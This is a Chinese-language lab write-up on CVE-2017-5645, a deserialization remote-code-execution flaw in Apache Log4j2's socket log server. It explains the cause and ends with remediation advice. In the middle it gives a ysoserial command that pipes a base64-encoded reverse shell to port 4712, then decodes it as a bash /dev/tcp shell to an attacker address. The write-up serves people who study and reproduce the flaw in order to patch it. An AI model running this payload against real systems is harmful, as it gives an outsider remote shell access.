介绍:
是一个与 Apache Log4j2 相关的安全漏洞,属于远程代码执行,它可能允许攻击者通过构造恶意的日志信息 在目标系统上执行任意代码
Log4j2 介绍
Log4j2 是 Apache 的一个日志记录工具,属于 Java 应用的日志框架,它是 Log4j 的升级版,性能更好,功能更多.它被广泛的适用于 Java 应用程序中,帮助开发者记录程序运行的时候的日子信息,是 Java 生态系统中最重要的一个日志框架之一
- 漏洞编号: CVE-2017-5645
- 漏洞类型:远程代码执行(RCE)
- 收影响组件:Apache log4j
- 漏洞触发原理:
-
- Log4j2 支持通过 SocketAppender 或者 SocketHubAppender 接受远程日志信息
- 在处理这些日志信息的时候 Log4j2 会对信息进行反序列化操作
- 由于未对反序列化数据进行检查,攻击者可以构造恶意的序列化对象,嵌入恶意代码
- 当系统中处理这些恶意日志消息的时候,会触发反序列漏洞,从而导致任意代码执行
漏洞利用:
-
- 环境起来以后将会在 4712 端口开一个 tcp 服务,使用ysoserial生成 payload 发送到 4712 端口即可!
ysoserial 介绍
ysoserial 是一个用于生成 Java 反序列化漏洞利用代码的开源工具
工具地址:
https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
-
- 直接利用 4712 端口的 TCP 服务反弹 shell 即可
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjgvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.100.102 4712详细介绍
使用base64解码:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjgvMTIzNCAwPiYx
结果为:bash -i >& /dev/tcp/192.168.12.8/1234 0>&1
bash -i 是一个启动交互式的 bashh shell
>& /dev/tcp/..... 将 shell 的输入/输出重定向到 Tcp 套接字
0>&1 将标准输入(文件描述 0)和标准输出(文件描述 1)合并,并且实现双向通信
这里可以看到,反弹shell 直接拿下!
- 修复建议:
-
- 升级到安全版本,升级到 log4j 2.8.2 或者更高的版本
- 禁用反序列化功能
-
-
- 如果无法立即升级,可以通过配置 log4j 的反序列化功能
-
-
- 限制网络访问
- 监控日志分析
总结:
要理解原理,理解原理之后再去复现就会有更加深入的理解!